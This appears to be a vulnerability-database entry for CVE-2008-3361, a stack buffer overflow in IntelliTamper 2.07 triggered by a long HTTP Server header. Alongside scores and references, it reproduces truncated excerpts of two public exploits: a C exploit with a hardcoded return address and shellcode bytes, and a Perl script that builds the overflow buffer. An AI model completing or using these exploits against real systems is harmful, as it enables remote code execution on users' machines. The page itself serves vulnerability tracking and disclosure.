CVE-2008-3361
Published 2008-07-29
CVE-2008-3361: Stack-based buffer overflow in IntelliTamper 2.07 allows remote web sites to execute arbitrary code via a long HTTP Server header.
Priority: P3 · 45 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 4.30% (89.9th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| intellitamper | intellitamper | — | — |
No detection rules found.
Exploit-DB
IntelliTamper 2.07 - HTTP Header Remote Code Execution
exploitdb·2008-08-10
---
/**
**
** IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit.
**
** Based on exploit by Koshi (written in Perl). This one should be more
** stable. Just for fun and to learn more about win32 exploitation.
**
** by Wojciech Pawlikowski ([email protected])
**/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define BUFSIZE 1550
#define NOP 0x90
#define RETADDR 0x7c941EED // jmp esp ntdll.dll
/* win32_exec - EXITFUNC=thread CMD=mspaint Size=336 Encoder=Alpha2 http://metasploit.com */
unsigned char shellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x30\x42\x31\x50\x41\x42\x6
Exploit-DB
IntelliTamper 2.07 - server header Remote Code Execution
exploitdb·2008-07-22
---
#!/usr/bin/perl
#
# IntelliTamper 2.07 Remote Code Execution ( server header )
#
# By: Koshi
#
# Guido Landi finally did it, thought i'd throw one in there.
# This example assumes you're scanning "http://127.0.0.1"
# For example, exploit may not work if you were to scan "http://127.0.0.1:80"
# or even changing it as slightly as "http://127.0.0.1/"
#
# gr33tz: Rima my baby, str0ke, messiah, Idol, old venny ;) , BU,
# and finally, Guido Landi for sparking my interest in exploiting
# this application.
#
#
use IO::Socket;
my $msg="";
my $overflow = "A"x1536;
my $fun = "".
"\xb3\x8d\x95\x7c". # EIP (0x7C958DB3 call esp NTDLL.DLL)
"z3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0C". # More buffer.
"AAAA2Cb3Cb4CBBBB"; # Starts
No writeups or analysis indexed.
References
http://securityreason.com/securityalert/4059
http://www.securityfocus.com/bid/30356
https://exchange.xforce.ibmcloud.com/vulnerabilities/44147
https://www.exploit-db.com/exploits/6118
https://www.exploit-db.com/exploits/6227
Published: 2008-07-29